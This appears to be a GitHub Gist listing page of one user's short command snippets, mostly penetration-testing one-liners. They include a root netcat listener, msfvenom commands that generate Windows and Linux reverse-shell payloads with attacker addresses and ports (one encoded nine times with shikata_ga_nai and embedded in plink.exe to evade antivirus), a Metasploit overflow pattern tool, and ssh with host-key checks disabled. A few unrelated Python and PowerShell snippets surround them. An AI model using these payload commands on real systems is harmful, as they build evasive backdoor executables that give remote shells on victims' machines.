Skip to content

Instantly share code, notes, and snippets.

su - -c "nc -nlvp 0.0.0.0 9999"
perl -e 'print "my date is $ENV{mydate}\n"'
msfvenom -p linux/x86/shell/reverse_tcp -f c -n 5
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.10.5 LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.4 LPORT=443 -f c -e x86/shikata_ga_nai -b “x00\x0a\x0d”
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 100
ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $argv[1]
@leveled
leveled / webbrowser-choose.py
Last active December 29, 2016 17:04
set the browser used by the webbrowser object in python
webbrowser.get('chrome').open('http://www.google.com')
Set-ExecutionPolicy RemoteSigned
@leveled
leveled / powershell-runas.ps1
Last active December 29, 2016 17:04
Use powershell to run an executable file as another user on Windows
$username = 'user'
$password = 'password'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Start-Process Notepad.exe -Credential $credential